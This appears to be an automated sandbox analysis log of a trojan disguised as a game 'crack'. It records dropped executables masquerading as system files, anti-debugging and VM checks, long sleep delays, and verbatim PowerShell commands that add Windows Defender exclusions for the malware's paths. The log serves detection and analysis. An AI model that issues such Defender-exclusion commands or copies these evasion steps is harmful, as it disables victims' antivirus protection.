                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeMemory allocated: 1A70000 memory reserve | memory write watchJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeMemory allocated: 1B420000 memory reserve | memory write watchJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeMemory allocated: 8C0000 memory reserve | memory write watch
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeMemory allocated: 1A530000 memory reserve | memory write watch
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeMemory allocated: F40000 memory reserve | memory write watch
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeMemory allocated: 1AD00000 memory reserve | memory write watch
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeMemory allocated: C70000 memory reserve | memory write watch
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeMemory allocated: 1A6D0000 memory reserve | memory write watch
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeMemory allocated: 1110000 memory reserve | memory write watch
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeMemory allocated: 1AB10000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\smss.exeMemory allocated: 30D0000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\smss.exeMemory allocated: 1B0D0000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\smss.exeMemory allocated: 11D0000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\smss.exeMemory allocated: 1890000 memory reserve | memory write watch
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeThread delayed: delay time: 922337203685477
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\smss.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\smss.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2692Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2602Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2827
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2154
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2494
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2647
                                    Source: C:\Program Files\Windows NT\smss.exeDropped PE file which has not been started: C:\Users\user\Desktop\BwtLSSWj.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeDropped PE file which has not been started: C:\Users\user\Desktop\wSzMZIas.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDropped PE file which has not been started: C:\Users\user\Desktop\USBzXUek.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeDropped PE file which has not been started: C:\Users\user\Desktop\DYilKdVO.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeDropped PE file which has not been started: C:\Users\user\Desktop\Rfxshdov.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDropped PE file which has not been started: C:\Users\user\Desktop\gDHycgoN.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeDropped PE file which has not been started: C:\Users\user\Desktop\OfbStevG.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeDropped PE file which has not been started: C:\Users\user\Desktop\rEjFTmFn.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeDropped PE file which has not been started: C:\Users\user\Desktop\JRLLnIaC.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDropped PE file which has not been started: C:\Users\user\Desktop\medFrqzz.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeDropped PE file which has not been started: C:\Users\user\Desktop\VlKreyqd.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDropped PE file which has not been started: C:\Users\user\Desktop\qmbOMItv.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeDropped PE file which has not been started: C:\Users\user\Desktop\EErUokRe.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeDropped PE file which has not been started: C:\Users\user\Desktop\ssnNFABl.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDropped PE file which has not been started: C:\Users\user\Desktop\sXGeTWEn.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZFTyARuY.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeDropped PE file which has not been started: C:\Users\user\Desktop\BOAdhoQl.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeDropped PE file which has not been started: C:\Users\user\Desktop\oCwXyDAs.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeDropped PE file which has not been started: C:\Users\user\Desktop\uQMeEZWw.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDropped PE file which has not been started: C:\Users\user\Desktop\lhCxVqkE.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeDropped PE file which has not been started: C:\Users\user\Desktop\kHvGrYKy.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDropped PE file which has not been started: C:\Users\user\Desktop\BAOTDPUV.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeDropped PE file which has not been started: C:\Users\user\Desktop\npqXqOLK.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZTFIdpqp.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDropped PE file which has not been started: C:\Users\user\Desktop\JDNtgNEK.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeDropped PE file which has not been started: C:\Users\user\Desktop\rfhNxLLD.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeDropped PE file which has not been started: C:\Users\user\Desktop\blWilNVX.logJump to dropped file
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23831
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe TID: 7952Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1760Thread sleep count: 2692 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4112Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep count: 2602 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2524Thread sleep count: 2827 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep count: 2154 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128Thread sleep count: 2494 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 316Thread sleep count: 2647 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4680Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4568Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe TID: 3868Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe TID: 5480Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe TID: 2520Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe TID: 1820Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe TID: 3540Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows NT\smss.exe TID: 5360Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\Windows NT\smss.exe TID: 1008Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows NT\smss.exe TID: 2220Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows NT\smss.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files\Windows NT\smss.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files\Windows NT\smss.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files\Windows NT\smss.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows NT\smss.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows NT\smss.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001CA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_001CA69B
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_001DC220
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001EB348 FindFirstFileExA,0_2_001EB348
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DE6A3 VirtualQuery,GetSystemInfo,0_2_001DE6A3
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeThread delayed: delay time: 922337203685477
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\smss.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\smss.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\AppData\Local
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\AppData
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user
                                    Source: wscript.exe, 00000002.00000003.1426480255.0000000002E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: smss.exe, 00000032.00000002.2177876464.000000001BE44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`#D
                                    Source: smss.exe, 00000032.00000002.2239000814.000000001BF11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: BlockcontainerWin.exe, 00000005.00000002.1578353516.000000001C56B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
                                    Source: w32tm.exe, 00000036.00000002.1695163459.0000023FFDCC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                                    Source: NursultanAlphaCrack.bat.exe, smss.exe.5.dr, BlockcontainerWin.exe.0.drBinary or memory string: adnFBHgFsDXar5GTELb9
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-24023
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001DF838
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001E7DEE mov eax, dword ptr fs:[00000030h]0_2_001E7DEE
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001EC030 GetProcessHeap,0_2_001EC030
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess token adjusted: Debug
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Windows NT\smss.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Windows NT\smss.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001DF838
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DF9D5 SetUnhandledExceptionFilter,0_2_001DF9D5
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001DFBCA
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001E8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001E8EBD
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portsurrogateFontCrt\BlockcontainerWin.exe "C:\portsurrogateFontCrt/BlockcontainerWin.exe"Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat" Jump to behavior
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
                                    Source: C:\Program Files\Windows NT\smss.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
